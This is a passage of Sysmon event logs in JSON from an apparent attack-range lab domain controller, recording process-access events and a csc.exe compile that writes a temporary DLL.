C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4582,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001049D90600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001049D90600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:19.295\r\nProcessGuid: {A837DB8D-0313-5F25-0000-0010A0D50600}\r\nProcessId: 2852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.dll\r\nCreationUtcTime: 2020-08-01 05:52:19.186","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:19.295","ProcessGuid":"{A837DB8D-0313-5F25-0000-0010A0D50600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.dll","CreationUtcTime":"2020-08-01 05:52:19.186","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.295\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.295","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.311\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: 